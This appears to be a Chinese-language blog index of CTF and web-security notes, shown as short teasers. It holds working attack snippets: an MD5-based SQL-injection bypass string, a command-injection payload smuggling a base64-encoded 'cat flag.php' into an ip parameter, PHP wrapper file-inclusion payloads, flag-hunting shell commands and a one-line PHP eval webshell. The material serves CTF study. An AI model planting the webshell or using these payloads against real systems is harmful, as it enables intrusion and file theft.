MD5碰撞脚本

0x04 MD5碰撞脚本
授人以鱼不如授人以渔,下面使多线程MD5哈希碰撞脚本,威力巨大。是根据网上代码改编而成,非原创。

# -*- coding: utf-8 -*-
import multiprocessing
import hashlib
import random

阅读更多 >>

MD5绕过手法

ffifdyop,这个点的原理是 ffifdyop 这个字符串被 md5 哈希了之后会变成 276f722736c95d99e921722cf9ed621c,
再转换为字符串:’or’6<乱码> 即 ‘or’66�]��!r,��b
这个字符串前几位刚好是 ‘ or ‘6,

阅读更多 >>

xml漏洞

XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。

阅读更多 >>

小知识点

php中可以把函数名通过字符串的方式传递给一个变量,然后通过此变量动态调用函数比如下面的代码会执行 system(‘ls’);
$a=’system’;
$a(‘ls’);

寻找flag文件常用命令小结:
system(‘ls’) : 列举当前目录下的所有文件
system(“find / -name flag”):查找所有文件名匹配flag的文件
system(“cat $(find / -name flag*)”):打印所有文件名匹配flag*的文件

阅读更多 >>

常见绕过方法

空格替代:
${IFS}
$IFS$9
<
<>
{,}


sh

/?ip=127.0.0.1;echo$IFS$2Y2F0IGZsYWcucGhw|base64$IFS$2-d|sh

阅读更多 >>

常见软件命令

[TOC]

xray

单个url检测

./xray_windows_amd64 webscan –url https://xxx.edu.cn –html-output edu.html

阅读更多 >>

PHP常见协议

PHP伪协议

php>=5.2
php://filter协议 ?file=file://D:/soft/phpStudy/WWW/phpcode.txt
php://input协议 ?file=php://filter/read=convert.base64-encode/resource=./index.php
data://协议
data://协议允许读入
要求:打开allow_url_fopen allow_url_include
?file=data://text/plain,
?file=data://text/plain;base64,编码

阅读更多 >>

文件上传

一句话木马制作

正常:

<?php
@eval($_POST['x']);

阅读更多 >>